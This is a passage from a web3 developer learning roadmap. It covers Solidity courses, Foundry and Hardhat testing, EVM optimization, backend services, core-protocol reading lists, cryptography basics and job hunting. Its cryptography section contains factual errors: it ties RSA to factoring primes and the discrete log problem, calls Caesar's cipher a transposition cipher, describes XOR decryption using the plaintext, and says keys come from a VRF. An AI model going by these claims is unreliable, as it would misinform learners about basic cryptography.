testing, auditing, testnet deployment, and mainnet deployments. There are also different sets of best practices that developers and production teams adopt in order to mitigate the security and economic risk of their applications. Another important part of writing smart contracts on Ethereum or Ethereum L2s is optimizing the contracts to minimize the amount of gas they consume. Since block space on Ethereum and L2s is limited, there needs to be a fee mechanism in order to avoid state bloat that gives a fixed gas price to each operation executed by the respective VM. That means that the more complex a smart contract is, the more expensive it will be to deploy and for the users to use. There are various design patterns that optimize the code to consume the least amount of gas possible, whilst remaining readable and secure. Solidity Solidity is by far the most popular language to write smart contracts at the moment as the EVM is the most widely adopted virtual machine out there. Not only is it used in Ethereum's execution layer, but many alt L1s and L2s on Ethereum use the EVM as their virtual machine since there's a fairly mature development ecosystem. In order to first learn Solidity, we'll go over a few simple courses that explain the principles of the language, and as we progress further we will talk about design patterns, testing, security, oracles, and more. CryptoZombies is an interactive web application that teaches you the basics of Solidity through a fun development game. It teaches you how to create a contract, the data types that Solidity supports, how to write methods, how to manage objects, events, inheritance, memory management, interfaces, modifiers, and more. By the time you finish the first three short courses, you'll be able to read and write Solidity code. An alternative to CryptoZombies which is in video form is the Solidity playlist from Smart Contract Programmer on YouTube. This one is a bit better as it covers Solidity 0.8.0 which is a fairly recent version. After we finish the course with the basics, we'll move on to building small projects implementing various different protocols, applications, and cryptographic primitives through the use of the scaffold-eth challenge that appear in this thread . Scaffold-eth is a web3 development template built by Austin Griffith and open-source contributors which abstracts the backend of your app and creates a front-end interface for interacting with the smart contracts that you write. We will start with the Ethereum Speed Run challenges in the thread mentioned above, and continue with building more complex applications like a signature-based multisig , an app that uploads images to IPFS , and more. Also a great way to learn solidty is to look through already written codes. For eg. https://solidity-by-example.org/ Now that you've been writing more and more complex smart contracts it is a good idea to start looking at other people's code to get a feel for how they implement different features, how they structure code, what designs and patterns they use, how they optimize for gas, and a lot more. There are many techniques that you'll be picking up along on your journey in order to make your contracts more resource-effective and gas-optimized so that your users don't need to spend as much money for using your applications. A good example of well-made smart contracts at the intermediate level are Miguel Piedrafita 's lil-web3 contracts. They are simple implementations of popular protocols and applications. They also have tests attached to them which are written using Foundry, which we will cover shortly. Take a look at how comments are written, how events and errors are used, how it is structured, gas minimization techniques he employs, try to understand the design of the protocol implementation, etc. Trying to implement your own versions of well-known applications and protocols is a great way to improve at Solidity as you'll learn a lot about the development process that you'll go through once you are writing production code at a company or DAO. Threads that talk about getting really good at Solidity Tips from Emilio Frangella @ Aave Tips from @freddycoen Tips for non-beginners from @0xCacti Tips from @transmissions11 Once you've gone through all of the above the best you can do to learn Advanced Solidity is to see what the best codebases look like. Look at how they structure their projects, what gas optimizations they use, what Solidity patterns they employ, how they do tests, how they create interfaces, how they handle events and errors, what libraries/dependencies do they use (if any), etc. Examples of great codebases: - Uniswap v2 / Uniswap v3 - Gnosis Safe - Compound finance - Zora v3 - Rari Capital - Ribbon Finance - AAVE - SushiSwap Testing Testing smart contracts is an essential part of the development process as it ensures that the code you write behaves as intended and is secure against various technical and economic exploits. Many different libraries are used by different teams, there are pros and cons to using each different library and in some cases, they can be used in a complementary fashion. We will cover the most popular ones among top-tier developers as well as the most commonly used ones like HardHat and Truffle. Opinionated recommendations: Foundry and Hardhat Foundry Foundry is the hottest library in the Ethereum development landscape, it is originally built by Georgios Konstantopoulos who is one of the most highly respected developers in the entire Ethereum ecosystem. Georgios is currently the CTO at Paradigm and part of his job is building tools for developers that will be used to create the applications of the future. Foundry is composed of two parts: Forge and Cast. - Forge: Forge is a fast and flexible Ethereum testing framework, inspired by Dapptools. - Cast: Swiss army knife for interacting with EVM smart contracts, sending transactions, and getting chain data. The library is written in Rust, which is a systems-level programming language that has memory safety, borrow checking, performant concurrency, and many other features which are making it one of the favorite languages used by developers across all fronts. Many popular libraries are being written in Rust, popular compiler targets like WASM are supported by Rust, a lot of Ethereum developer tooling is built using Rust or is refactoring their infrastructure to use Rust. It is a very exciting trend in blockchain development and many developers are learning the language to be able to contribute to these cool pieces of software. The best way to get started with Rust is The Rust Book and the Rustlings repo . The reason why Foundry is getting a lot of popularity and it is so important, is because Solidity tests should be written in Solidity and not in JavaScript. It is very hard to master two different languages at once and Solidity developers shouldn't be forced to learn it in order to be able to test their smart contracts. Foundry is also getting an increasingly superior development environment in terms of features. The main features for which you might use other toolkits are mainly deployment which is not supported by Foundry so far. For managing deployments, the standard toolkit is HardHat. For testing, gas optimization features, fuzzing, symbolic execution (hevm), etc, do use Foundry. Good resources for learning and mastering Foundry are: The Foundry Book - Community sourced documentation Tweet from @andreasbigger : Familiarize yourself w/ Forge-cli Checkout some templates: FrankieIsLost forge template ZeframLou forge template AndreasBigger femplate Dive into repos using Foundry: lil-web3 n3rp zen cloaks ethernaut-x-foundry damn-vulnerable-defi-foundry Multicall Brockelmore's testing verbosity with forge-std HardHat Hardhat is the Ethereum development library that’s the most widely used across the ecosystem and is the standard in most production codebases like Aave, Uniswap, and many others. Usually, all the deploy scripts, migration files, automation scripts, etc are written using Hardhat and their tooling suite. It is a javascript library (that has Typescript support). Recently the Hardhat team announced that they are moving their infrastructure to Rust as most of the tooling ecosystem is moving to use it do its performance and security. Truffle Suite Truffle Suite is a suite of tools developed by Consensys to locally test smart contracts by deploying them on a local instance of the Ethereum blockchain, mocking user addresses using the Ganache library, writing tests using Truffle, and creating on-chain data pipelines for user interfaces using Drizzle. It was one of the first complete Ethereum developer tooling ecosystems that were released, but they’ve fallen out of favor in recent years as libraries like Hardhat overtook it. Dapptools Dapptools is a suite of Ethereum focused CLI tools following the Unix design philosophy, favoring composability, configurability, and extensibility. There are 4 key elements in Dapptools: - dapp - All you need Ethereum development tool. Build, test, fuzz, formally verify, debug & deploy solidity contracts. - seth - Ethereum CLI. Query contracts, send transactions, follow logs, slice & dice data. - hevm - Testing-oriented EVM implementation. Debug, fuzz, or symbolically execute code against local or mainnet state. - ethsign - Sign Ethereum transactions from a local Keystore or hardware wallet. A cool innovation done by app tools was the hEVM which is an EVM implementation written in Haskell (a functional programming language) that allows to symbolically execute Solidity code and formally verify the results of the resulting bytecode (opcode operations). This feature was later adopted by Foundry, including many others that were first provided by Dapptools. Design patterns Once you're comfortable with writing more and more complex contracts and maybe taking a look at the front-end code and it interacts with the smart contracts, you'll start getting a feel for how smart contracts are designed from a more high-level view. There are certain designs and patterns which are commonplace, things like the approved pattern for tokens, and more. At this point, it is a good idea to start thinking more about the overall architecture of your code and the structure that it will take to efficiently implement the functionality you want to enable. There are common patterns employed in smart contract development, this Solidty-patterns repo implements some of them. Since the EVM is such a constrained environment where each additional operation executed by the EVM adds gas costs to the execution of the smart contract, developers try to build as least resource-intensive contracts as possible whilst also maximizing readability and security. Since blockchains are a very adversarial environment were mistakes in a smart contract could lead to fund drains (RUGS) and exploits, it can be considered mission-critical software and so many developers get inspiration from other mission-critical software guidelines like the ones of NASA which are responsible for the lives of astronauts going to space. These development principles are guidelines that help optimize a codebase for maximum security through the adoption of a standardized procedure and developer mindset. ENS integration We mentioned how to integrate ENS domain names into your dapp within the front end development section , but as a smart contract developer you can also resolve ENS domain names on-chain , write your own resolver which implements EIP137 or even write your own registrar . Specialized languages There are various programming languages that can be compiled into EVM bytecode, there are high-level programming languages such as Solidity, Vyper, or Fe, but there's also an intermediate programming language that's often used within gas-optimized contracts called Yul, or as a developer, you can write EVM assembly by writing the EVM opcodes directly. A common technique for gas minimization is writing Solidity code looking at the resulting EVM assembly code and comparing the gas cost of different implementations in order to make the contract as gas-efficient as possible. Yul Yul is an intermediate-level programming language that can compile into EVM bytecode. From the Solidity documentation: "The design of Yul tries to achieve several goals: Programs written in Yul should be readable, even if the code is generated by a compiler from Solidity or another high-level language. Control flow should be easy to understand to help in manual inspection, formal verification, and optimization. The translation from Yul to bytecode should be as straightforward as possible. Yul should be suitable for whole-program optimization. In order to achieve the first and second goals, Yul provides high-level constructs like for loops, if and switch statements and function calls. These should be sufficient for adequately representing the control flow for assembly programs. Therefore, no explicit statements for SWAP , DUP , JUMPDEST , JUMP and JUMPI are provided, because the first two obfuscate the data flow and the last two obfuscate control flow. Furthermore, functional statements of the form mul(add(x, y), 7) are preferred over pure opcode statements like 7 y x add mul because, in the first form, it is much easier to see which operand is used for which opcode." EVM Assembly EVM Assembly can be written inside of inline Solidity statements with the assembly keyword. It allows for more fine-grained control over the resulting bytecode. Oftentimes the compiler is unable to optimize Solidity code well and so it results in unnecessary gas costs. There's also an unchecked keyword in Solidity which disables the overflow and underflow checks from the compiler which were introduced in Solidity 0.8.0 and before were part of the SafeMath library in OpenZeppelin libraries. The unchecked keyword is oftentimes used Writing Yul or inline assembly can obfuscate the functionality of your code by making it less readable for other contributors/auditors and it can potentially introduce new risks as the Solidity compiler oftentimes performs various optimizations and security checks. Good toolkits for writing EVM Assembly: - etk - huffc - and the afforementioned Yul intermediate language EVM deep dive Understanding the ins and outs of the EVM is crucial for building highly optimized applications as each operation executed by the EVM has a gas cost attached to it and users have to pay the price for executing functions within the applications that they use. There is a compromise between readability and code optimizations however, which needs to be taken into consideration. Sometimes using techniques like bitshifting and bitmapping ( Hacker's Delight is a good book that talks about bit manipulation techniques in detail) can have a negative impact on readability and thus security, as other contributors and auditors may not be able to wrap their heads around these complex optimizations or it would simply take too much time for them to do so. For code that actually goes into production, each project needs to asses how much do they want to optimize their code for gas savings over readability. Security usually comes first, however there are still a set of well-known good practices that will allow you to save some gas. If you end up using gas optimization techniques it is also advised to document them well with comments inside of your Solidity contracts. Another important point is that as these technologies scale and developers are less constrained by the virtual machine executing smart contract bytecode, the needs for optimizations becomes less important along with the fact that the compilers converting static code to machine code are getting better and better at optimizing code for performance and low costs. As technologies like L2s and data availability layers become mainstream we also may see an emergence of new VM architectures that experiment with new designs that do not require developers to work with low-level optimizations as they will be highly performant and scalable. For a comprehensive EVM deepdive, I suggest these resources: Ethereum Explained: The EVM The EVM Handbook EVM development starter kit Read Chapter 13 (EVM) of The Ethereum Book Read Femboy Capital's Playdate with the EVM Go over OpenZeppelin's series on Deconstructing smart contracts Read Analyzing smart contracts by Elvira Albert (very math heavy) Read over TakeNobu's slides on how the EVM works (visualized) Go over design patterns section Go over the exemplary good codebases at the beginning of the Solidity section Follow gas optimizoors like @transmission11 for gas alpha Get used to going to lookup gas costs for different OPCODE operations at EVM Codes Check out the EVM execution specs Learn to use Foundry well Bonus resources in comments of this Twitter thread Special thanks to [@0x_doggie] and [@freddycoen] from whose threads I extrapolated these resources. - Thread 1 - Thread 2 You might wanna go through Nick's Posts and Jean's Solidity articles Backend development As far as blockchain development goes, most of the logic that traditional applications would consider backend is encapsulated within smart contracts, however, there are also complementary technologies that allow you to query data from blockchains, index the data, create databases so that you have on-demand data from custom APIs, decentralized storage for content, user authentication / DID, etc. I wouldn't consider this its own specialization, but it is a sufficiently unique skill set for me to cover it separately. This image was created by my fren Nader Dabit who is a full-stack blockchain developer that has created many useful guides, some of which I'll feature in the full-stack development section. This web3 stack landscape graphic comes from a recent blog post of his called The complete guide to full-stack web3 development . Decentralized File Storage There are many applications that require storing files of all sorts and making them available for your decentralized applications, NFTS for example only have a link to the URI metadata on-chain, and that URI points to a decentralized storage endpoint on IPFS or Arweave. Meaning that all the images and the traits of the NFT are hosted in their file storage networks rather than on the Ethereum mainnet in order to save on costs and allow for higher bandwidth. IPFS IPFS is one of the most popular decentralized file storage solutions out there, there are projects like Filecoin being built on top and many NFT metadata are hosted inside of the network. There are solutions like NFT Storage that make the metadata hosting completely free to upload your NFT metadata on-chain by leveraging their Javascript API. Arweave Arweave is another such solution. Arweave is a type of storage that backs data with sustainable and perpetual endowments, allowing users and developers to truly store data forever – for the very first time. As a collectively owned hard drive that never forgets, Arweave allows developers to remember and preserve valuable information, apps, and history indefinitely. An increasingly popular use case of decentralized file storage solutions is web hosting, since we are on a quest to build decentralized applications that are uncensorable, it is good practice to also decentralize the user interface by deploying it on decentralized file storage networks like IPFS and Arweave. This prevents the applications you built from being censored by centralized entities shutting down your deployments on centralized platforms like Vercel, AWS, Azure, or any other. Part of good practices of modern applications is open-sourcing the front end of their applications so that anyone can run them locally and also deploying several other instances to decentralized file storage solutions as well as usually hosting their own front end in a centralized server for added performance. Indexing / Querying The applications you will be building need to know what is the state of the blockchain so that your users know what is happening and can interact with the application effectively. An example of this is Uniswap's AMM. In order to call the swap function in the smart contracts, you need to know how many tokens you will get back with an X amount of ETH that you put into the contract. In order to display the current price of any asset, your application will either query data from the blockchain directly or it will use an indexing service that has that data already available. These APIs are very useful and are a critical part of any application. TheGraph A very popular service is TheGraph . TheGraph is a decentralized indexing protocol that allows you to query networks like Ethereum, the protocol has an incentive layer that rewards indexers to create APIs for the data you specify. Developers can create so-called subgraphs, which are data APIs that make the data easily accessible through a GraphQL schema. GraphQL is a querying language that is used as an alternative to traditional REST APIs. GraphQL schemas are harder to set up initially, but in turn, they enjoy massive scalability. In order to learn more, check out their documentation . To learn how GraphQL works checkout the official documentation , HowToGraphQL and this YouTube playlist (although it may be a bit outdated by now, better check the documentation). CovalentHQ An upcoming service and simpler alternative to TheGraph is Covalent . Its API allows you to pull detailed, historical and granular data from multiple blockchains with no code. It has a rich palette of endpoints serving data from categories including balances, NFTs, and DeFi. The APIs provide data for several different blockchains like Ethereum, Polygon, Avalanche and is currently free to use. In order to learn more, check out their documentation and API docs . They have an active youtube channel as well with a playlist on building web3 projects using Covalent. Nodes as service One of the most common ways to query data from the blockchain is by calling RPC endpoints of nodes that are syncing the full-state of the blockchain. A node runs the Ethereum blockchain, has all of its state, and syncs periodically every single time a new block appears. You can run your own node on consumer hardware, but it is unscalable if you want to use those nodes for querying data for massive applications as you'd need to build your own DevOps pipelines in order to scale to your needs accordingly. That's why most developers use a third-party node provider like Alchemy , Nodereal , or Infura . You can call these APIs by using web3 libraries like ethers.js , web3.js or myriad others. Moralis Moralis is a web3 development platform that automates your backend, instead of having to query data from nodes, indexing the data, and creating databases so that you don't need to query the blockchain on every user request, Moralis does it for you. You instantiate a Moralis server that exposes an API to all blockchain data through a REST API to a PostgreSQL database. It also has smart contract alerts, cloud functions, cross-chain user authentication, and more. The only downside of using Moralis is that it's a centralized service provider. It is the easiest way to get a backend for your Dapp going as Moralis has a very simple to use SDK that helps you tap into the APIs offered by their services. It is a great way to get started building backends as most of the heavy lifting is done for you. To learn how to use Moralis checkout their documentation and their YouTube channel . Thirdweb Thirdweb provide smart contracts, SDKs and UI components that creators, game studios and developers can integrate into their app To learn how to use Thirdweb checkout their documentation Oracles Oracles are data feeds that bring off-chain data on-chain so that the smart contracts that you build can query real-world information and build logic around it. For example, prediction market Dapps use oracles to settle payments based on events. A prediction market may ask you to bet your ETH on who will become the next president of the United States. They'll use an oracle to confirm the outcome and payout to the winners. What is an oracle? - Chainlink Chainlink is the most popular oracle out there, you'll usually use it to get price feeds, to get verifiable randomness, to call external APIs, etc. If you want to get started building with Chainlink, go to their documentation . DID / Authentication DID (decentralized identity) and web3 user authentication are a disruptive new primitive on the internet as we can be self-sovereign users of the internet and own our own value within it for the first time in human history. Usually, your user profile is managed by centralized service providers like Google, Facebook, Apple, Amazon, and others. In web3, the concept of a digital identity is much broader as it can span many more different areas such as financial history, games, social interaction (decentralized social media, i.e. Lens Protocol ), and much more. It is still not clear how web3 user management will look like a few years from now, but there are a few solutions that are being standardized and are emerging as potential winners. SpruceID SpruceID is a decentralized identity toolkit that allows users to sign and verify W3v verifiable credentials which are configurable across many interfaces. Use cases cited in the SpruceID documentation include: Authenticity for NFT creators, decentralized backup or recovery of decentralized identity, decentralized on-boarding for private DeFi pools, decentralized app-hosting, and many more potential use cases in the future. In order to integrate the Spruce DID solutions visit their developer portal. Sign-in with Ethereum Sign-in with Ethereum is an initiative that came off EIP-4361 which set off to standardize how Ethereum accounts interact and authenticate with off-chain services by signing a standard message format parameterized by scope, session details, and security mechanisms (e.g., a nonce). The goals of this specification are to provide a self-custodied alternative to centralized identity providers, improve interoperability across off-chain services for Ethereum-based authentication, and provide wallet vendors a consistent machine-readable message format to achieve improved user experiences and consent management. Many application builders have already adopted this signature standard for building applications on Ethereum as it streamlines the process for everyone and makes it more seamless for users since they have easily readable signatures from EIP-191 . The aim of this EIP specification is to create a login standard similar to how web2 login with Google and Facebook became catalysts for adoption. Automation Within blockchain applications there are many actions that are repetitive and cumbersome to execute, for example, having to change the liquidity provision ranges inside of an active Uniswap v3 liquidity provision strategy, claiming rewards from yield vaults, and many other actions that users would like to automate so as to not have to deal with manual execution overhead. Gelato network Gelato Network is an automation protocol that runs as a decentralized network of bots used by web3 developers to automate smart contract executions on public EVM compatible blockchains including Ethereum, Polygon, Fantom, Arbitrum, Binance Smart Chain, and Avalanche. In order to get started automating tasks inside of your application check out the official Gelato documentation which has tutorials on how to set up bots to regularly execute any given task in exchange for a small transaction fee. The setup inside of the contract function that you want bots to run would look something like this: Miscellaneous APIs When building applications you will want to display miscellaneous information from various different other applications or protocols, e.g. price feeds for different tokens on different AMMs, the price of NFTs listed on different marketplaces, various data from services your application relies on, etc. As a backend developer, your responsibilities are to know where you can find reliable sources of data for your application and build the infrastructure needed to fetch it so that frontend developers can display it on the site. It is also important to build redundancy of the data you query and store it in your own databases in order to prevent your application from failing in the case of API dependency failure. Opensea A good example of such an API is OpenSea’s API which is public and can be queried in order to get the prices of NFT listings OpenSea, get floor prices, volumes, a bunch of other prices historical data, NFT metadata, and more. As a developer, you can also create your own databases and API endpoints to fetch data from those databases. It is also a good way to earn revenue, by creating SaaS services around API keys with rate limits for how much data anyone can query off your servers. For building APIs you can for example use a REST API infrastructure with NodeJS and PostgreSQL, or for example, you can write a TheGraph subgraph. Full-stack blockchain development As the name implies, full-stack blockchain development is the closest specialization to being a jack of all trades. It involves building out all of the aspects of an application from front end, to smart contracts, to backend (at least to a certain degree). This is the most generic role that most blockchain developers will take and most companies and DAOs are looking for in a contributor. Since there is such a high demand for quality developers in the space, it is oftentimes the case that employers onboard people from different fields and turn them into a jack of all trades within web3 development so as to save costs and reduce HR resource requirements (which are incredibly scarce nowadays). Since rewriting the front end , back end and smart contract sections would be pointless, I'll dedicate this section just to list a bunch of full-stack guides, tips and tricks, deployment guidelines, project management, and other relevant information. Full-stack guides Introduction to Ethereum Development - Austin Griffith The Complete Guide to Full Stack Web3 Development - Nader Dabit Speed Run Ethereum - Austin Griffith Solidity, Blockchain, and Smart Contracts Course - Beginner to Expert Python Tutorial - Patrick Collins Full-stack blockchain solidity course - Patrick Collins Full-stack tutorials Introduction to Ethereum Build Uniswap Blockchain Web3 App with Solidity | Next.js | Sanity.io Building and deploying on L2s and DA layers Coming soon Optimism Developer docs New Bedrock protocol specs Arbitrum Developer docs Protocol description zkSync Developer docs New 2.0 docs Starknet / StarkEx StarkNet / Cairo docs Core protocol development General Learning There are many topics to learn about in core-development, one can specialize in any area. Here is a selection of learning-resources. Basic: - Merkle trees: - Ethereum execution-layer Merkle Patricia Tree walkthrough - Execution and Consensus layer Merge design , video by Danny Ryan - Rollup centric roadmap , post by Vitalik - Ethereum protocol ELI5 (coming soon) Medium: - Yellow Paper : L1 protocol specification in paper form - ABI: Application Binary Interface to interact with contracts - EVM opcodes : interactive reference - RLP : the encoding used everywhere in execution-layer - SSZ specs : encoding and merkleization of Eth2, also see visualized encoding and visualized hash-tree-root . - EVM : overview of the machine that runs smart-contracts - Executable specs: readability-first python implementations of the protocol specification. - Consensus-layer , also see pip package - Execution-layer , also see the rendered version . - Simplified Eth2 Phase0 specs intro - Light client design and implementation Advanced: - Builder proposer separation: - Proposer/block builder separation-friendly fee market designs - Flashbots: frontrunning the MEV crisis - state of research and - Fork-choice Gasper paper: Combining GHOST and Casper - Dagger-Hashimoto (legacy PoW) - State DB design, Erigon docs: - Choice of storage engine - State representation - BLS: - Signature aggregation in eth2 by Justin Drake - BLS12-381 For The Rest Of Us by Ben Edgington - BLS Signature for Busy People by Paul Miller - KZG: - KZG polynomial commitments by Dankrad Feist - ZK Study Club part 1: polynomial commitments by ZK FM podcast with Justin Drake - ZK: - ZK study club playlist by ZK FM podcast - Fraud proofs (optimistic rollup tech): - The State of Optimistic Rollup older overview by Daniel Goldman - Inside Arbitrum arbitrum fraud proof - Cannon optimism fraud proof - LibP2P : the network layer in Eth2, Polkadot, Filecoin and other blockchains. - DevP2P : the original network layer in Eth1 / execution-layer of ethereum. - Whisk: A practical shuffle-based SSLE protocol for Ethereum - VDF research : verifiable delay function for ethereum and other protocols - Data Availability Sampling (DAS): - DAS in practice - DAS in full sharding design L2 Layer-2 scales Layer-1 by increasing capacity without significantly changing the security assumptions of the Layer-2. Although this does not change L1 itself, it does influence the general scaling design direction, generally pushing ethereum into a rollup-centric roadmap . Domains: - Side-chains: EthHub , eth org - State channels: EthHub , eth org - Plasma (mostly deprecated): EthHub , eth org - Rollups intro by Polynya - ZK rollups (ZKRUs): EthHub , eth org - Optimistic rollups (ORUs): EthHub , eth org - Bridges: eth org intro - L3 / validiums / volitations etc: - starkware L3 - Validium eth org intro Refer to L2beat.com for an overview of active L2 scaling solutions. L1 Domains: - Eth1 / execution layer - Networking: devp2p - EVM - Tx pool - Sync methods (Fast, Snap, Archive, Beam, Light) - State DB - User-facing (JSON RPC, tx tracing, etc.) - Eth2 / consensus layer - Networking: libp2p - Fork-choice - Attestations / BLS aggregation - Staking / Validator clients - Slashings - Sharding News Selection of protocol news resources: - Week in Ethereum : OG weekly news letter - Eth2.News : eth2 news by Ben Edgington Communication Discord Eth R&D server Eth magicians , forum for governance / protocol discussion Eth research , forum for research discussion AllCoreDevs (ACD): discord channel in R&D Ethereum Foundation youtube channel (streams ACD and Consensus calls) L1 Specifications Execution layer Ethereum Improvement Proposals: EIPs Execution APIs New Execution py-specs Consensus layer Consensus specs Beacon APIs , also see interactive site Annotated specs by Vitalik Buterin Eth2 book : extended annotated specs with some eth2 history, by Ben Edgington Legacy (but good) resources: Proof Of Stake F.A.Q. Sharding F.A.Q. Ethereum sharding research compendium Ethereum core teams Client teams (those that are open-source), in no particular order: | Domain | Project | Language | Discord | Docs | |-------------|--------------------------------------------------------------------------------------------------------------|---------------|----------------------------------------------------------------------------|--------------------------------------------------------------------| | Eth2 | Prysm | Go | invite | docs | | Eth2 | Lighthouse | Rust | invite | docs | | Eth2 | Lodestar | Typescript | invite | docs | | Eth1 + Eth2 | Nimbus eth2 and eth1 | Nim | invite | docs | | Eth2 | Teku (Artemis + Harmony) | Java / Kotlin | invite | docs | | Eth1 | Go-ethereum | Go | invite | docs | | Eth1 | Nethermind | C# | invite | docs | | Eth1 | Besu | Java | invite | docs | | Eth1 | ethereum-JS | Javascript | invite | docs | | Eth1 | Erigon | Go | Invite-only | docs | Computer science Client development Geth MEV searcher Coming soon. Security engineer WIP Cryptography Cryptography is the backbone of distributed ledgers. No distributed permissionless system is possible without asymmetric cryptography. If you are interested in building decentralized applications, it's essential to understand the wallet generation and transaction signing processes. Both of which rely heavily on underlying cryptographic protocols. Throughout this section, I provide a wide array of information about cryptography. DISCLAIMER: While playing with these algorithms on your own is a great way to learn, you NEVER want to use your cryptographic protocols in a production environment. The existing libraries have been well-vetted and battle-tested over many years. Because cryptography is complex by design, attempting to build your cryptographic protocols is incredibly dangerous. What is cryptography Cryptography is the study of enciphering and deciphering information preserving the privacy of enciphered information. Modern cryptography is mathematically robust and plays a critical role in securing sensitive information like your bank account numbers and social security number. While the mathematics may seem complex and intimidating, the concepts are graspable even without completely understanding the encryption algorithms. Cryptography is made up of a collection of primitives which serve as building blocks for different cryptographic protocols. Some examples of cryptogrpahic primitives include hash functions such as sha-256 and md5(a one way map), and verifiable random functions (VRFs). True randomness is extreamly dificult to capture, but mathmaticians have developed a way to construct randomness that is indestinguishable from true randomness . These primitives are used to build more robust tools like ciphers. Ciphers are algorithms used to conceal (encrypt) and decrypt information. The encrypted data is called ciphertext, while the translated information is called plaintext. There are two general categories of ciphers, symmetric ciphers and asymmetric ciphers. We will go into the difference and some examples throughout this section. Symmetric Ciphers A cipher is symmetric when the same Key used to encrypt information is also used to decrypt information resulting in Key symmetry. A simple example of this is a XOR cipher. To encrypt with an XOR cipher you simply XOR the bits of the key with the bits of the plaintext. To decrypte the cipher text you XOR the same key with the plaintext. I have provided an XOR truth table bellow for convienence. | A | B | A XOR B | | -- | - | ------ | | 0 | 1 | 1 | | 0 | 0 | 0 | | 1 | 1 | 0 | | 1 | 0 | 1 | NOTE this cipher is if the same key is used more then once. See this article for the details Other examples of symmetric ciphers include the transposition ciphers like Caesar's Cipher , and permutation ciphers. Both are easily broken by frequency analysis . Most monoalphabetic Symmetric ciphers (one alphabet) are broken with frequency analysis. There are existing Symmetric ciphers that have not been broken. A good example is the Advanced Encryption Standard or AES . However, the security of AES relies on having a sufficiently large key size. Symmetric ciphers are appropriate until you need to send a key over a communication protocol securely. You and the receiving party must share a key to share private information over a secure communication channel. You can see this chicken or the egg problem forming. How do you securely share the Key? Asymmetric Ciphers The ciphers used today that distributed ledgers rely on are asymmetric ciphers. Asymmetric ciphers address the key exchange problem presented above by using a different key to encrypt information than they do to decrypt information. These keys are known as the public and private key pair. The asymmetric cryptosystem is only possible because of a mathematical relationship between the public and private key pair. The first breakthrough with asymmetric cryptography was the Rivest Shamir Alderman RSA cipher named after its creators. The security of RSA relies on the fact that factoring large prime numbers is hard, more precisely the Discrete Log Problem . These ciphers allow anyone to encrypt information intended for you with your public key, but only you can decrypt it with your private key. While RSA was a breakthrough in cryptography, it was computationally not as fast as some of the leading symmetric ciphers at the time. Thus, RSA was used to securely share the symmetric key cipher, after which the symmetric cipher was used. RSA was the state of the art until a curve initially discovered about 2000 years ago by Dophantus was explored for a better approach. There is an algebraic structure called a finite field . In a finite field, the elements in the field obey slightly more abstract rules when compared to arithmetic operators on real numbers. You can define a finite field of rational points on a curve given that you can define multiplication and addition between these points, and the results under these definitions remain rational points on the curve. The class of curves that these fields have been defined over for asymmetric cryptography are called elliptic curves and fallow the general equation of y 2 = x 3 + ax + b where a and b are constants. How does this relate to the discrete log problem? It turns out that the discrete log problem in the finite field of an elliptic curve is preserved and still very difficult. Thus we can construct similar primitives like those constructed in RSA over fields of elliptic curves. The advantage over RSA is that they are relatively fast, so more than 90% of all internet traffic year to date is encrypted with elliptic curves. Detail on the parameters for curve p256 can be read about here . If you are curious about how the addition and multiplication operators are defined in the finite fields over these curves, I recommend this reading . Digital Signatures We can create a new cryptographic primitive called a digital signature with asymmetric cryptography. For example, you want to prove that you have the corresponding private key to a public key (to authorize a transaction). A simple way to think about this is what if you encrypt information with your private key and allow anyone to use your public key to decrypt this information. The Elliptic Curve Digital Signature algorithm ECDSA is slightly more complex and requires you to have a vital source of randomness as one of the parameters. Nonetheless, this is how you authorize (send) a transaction from your wallet. You sign the transaction with your private key (revealing no information about the private key) to prove you have the authority to authorize your transaction. You can now see how anyone with your private key can authorize transactions on your behalf. Not your keys, not your crypto Wallet generation in Ethereum. To generate a wallet address in Ethereum, you first randomly generate a 256 bit private Key with a verifiably random function (VRF). Then you use elliptic curve cryptography to generate the corresponding 256-bit public Key. Finally, you hash the 256 bit public Key with keccak256 to a 160-bit address. With a 256-bit key, the odds of someone generating a private key already in use (a collision) is 2 -256 and computationally unfeasible. Protocol development Coming soon. Blockchain data analytics (provisional) This section will primarily cover EVM based chains as of now. Getting started with data analytics in web3 is really easy, because everything is standardized, there are tons of visualization/explorer tools, and most of the existing analysis in the space is fully open-source. No matter your background and experience level, I recommend starting your analytics journey with SQL - it's the easiest to work with and share by far. Resources for getting started: Guide to how to think about web3 data, the tools you'll need across the data stack, and some skills/roles that are common in the space. For basics of both SQL and Ethereum, start here Once you're comfortable with those, start with the intermediate material here If you're comfortable with contract tables and want to dive more into the base data tables (transactions, logs, traces) then check out this complete break down of an Ethereum transaction (including proxy patterns). A lot of event and call data analytics relies on using aggregations to get to the most current state. Skip that noise and go to storage and state data analysis when you're ready (this will require you to learn some solidity) To fully dive in and become a web3 analyst, check out the OurNetwork Learn 30 day data course with videos that cover a multitude of topics. Once you're ready to start applying to roles, one place to start is applying to this talent board for a chance to have 1:1 help finding a role. Beginner friendly orgs to start getting involved in: MetricsDAO (runs workshops and bounties weekly) Index Coop (lots of broad protocol analytics generally to learn from) Dune Wizards (lots of helpers, and some harder bounties) Flipside Gunslingers (lots of helpers, and a more focus on cross-chain work like Harmony, Terra, Solana, etc) Some data feeds to follow to keep updated on newest analysis in the space: Dune Digest & Podcast OurNetwork Weekly Data Newsletter Application-based development Coming soon. DeFi WIP Lending/Borrowing DEXs Yield aggregators MEV Coming soon. The Dark Forest Frontrunning Backrunning Creator economy Coming soon. Gaming development Coming soon. Coordination / Public Goods Coming soon. Getting a job Once you start having a solid foundational skillset within blockchain development you can start looking for junior positions in your area of interest. One of the best parts of web3 is that many projects have open-source codebases which make it much easier to contribute to. There are various structures in web3 that allow a developer to get paid for their work, some of them are: - working for a company that is building a web3 product - getting grants from Gitcoin or several different DAOs - being a DAO core contributor and getting paid with bounties The easiest way to find a job is being active in the social platforms of the projects you'd like to be hired at or contribute to, e.g. if you want to become a smart contract developer at Uniswap, then talk to the team on Discord, suggest them new features, implement mockups, apply for a grant and if you are good enough someone will notice and try to hire you to work on it full-time within the DAO itself or for Uniswap Labs which is the core team leading the smart contract development efforts. The most important thing is to show initiative, being proactive and openly talking about helping. If you come across something interesting also don't forget to post it on Twitter or on Telegram. In order to find interesting projects to work for, web3 devs look at Twitter as it's the place where everything unfolds and where every single project lives. If you build out a reputation as a good blockchain developer, then you'll start getting DMs from interesting people and projects as there is an extreme lack of talent in the space and insatiable demand for good developers. Portfolio In order to become a good job candidate, it is almost imperative to have a portfolio of projects that you've built in order to showcase the skills you have, the technologies you use and your thought processes behind solving different problems. I.e. if you are interested in building DeFi applications then you can showcase that by writing a demo of an AMM, a yield aggregator, a money market, etc. The more high quality demo projects you have the better as these will act as valuable information for 